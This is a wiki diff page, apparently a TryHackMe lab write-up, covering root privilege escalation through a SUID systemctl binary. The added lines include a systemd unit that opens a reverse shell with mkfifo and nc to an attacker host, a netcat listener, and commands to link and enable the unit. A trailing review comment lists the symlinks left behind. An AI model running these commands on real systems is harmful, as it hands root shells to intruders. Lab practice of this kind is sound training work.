The gMan nixWiki

prac_app_tryhackme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
prac_app_tryhackme [2022/09/24 19:01] gman
prac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 81: Line 81:
  
 **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]] **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
 +
 +===== Exploit =====
  
 [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE. [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
Line 110: Line 112:
  
 <code>ls -lah /tmp</code> <code>ls -lah /tmp</code>
 +
 +===== Alternative Exploit =====
  
 **To get a reverse root shell:** **To get a reverse root shell:**
Line 121: Line 125:
  
   * Create your unit file:   * Create your unit file:
-<code> 
  
 +<code>
 +echo '[Service]
 +Type=oneshot
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
 +[Install]
 +WantedBy=multi-user.target' > gk.service
 </code> </code>
 +
   * Open a listener on your attack machine:   * Open a listener on your attack machine:
-<code> 
  
-</code>+<code>nc -lvnp 7777</code> 
   * Link and start the service:   * Link and start the service:
 +
 <code> <code>
 +/bin/systemctl link /tmp/gk.service         # need the full path 
 +/bin/systemctl enable --now /tmp/gk.service
 </code> </code>
  
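Review bot: the new "Link and start the service" step gives the `/bin/systemctl link` and `enable --now` commands but does not document what they leave on the host, which a writeup of this kind should state: `link` places a symlink to `/tmp/gk.service` under `/etc/systemd/system`, and `enable` adds a second symlink in the `multi-user.target.wants` directory named by the unit's `WantedBy=` line, so the unit file in `/tmp` plus those two symlinks are the artefacts a defender reviewing the machine afterwards would find. A one-line note to that effect after the code block would make the step's side effects clear. Minor style point: the first command line carries trailing whitespace after `# need the full path`.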
prac_app_tryhackme.1664046100.txt.gz · Last modified: by gman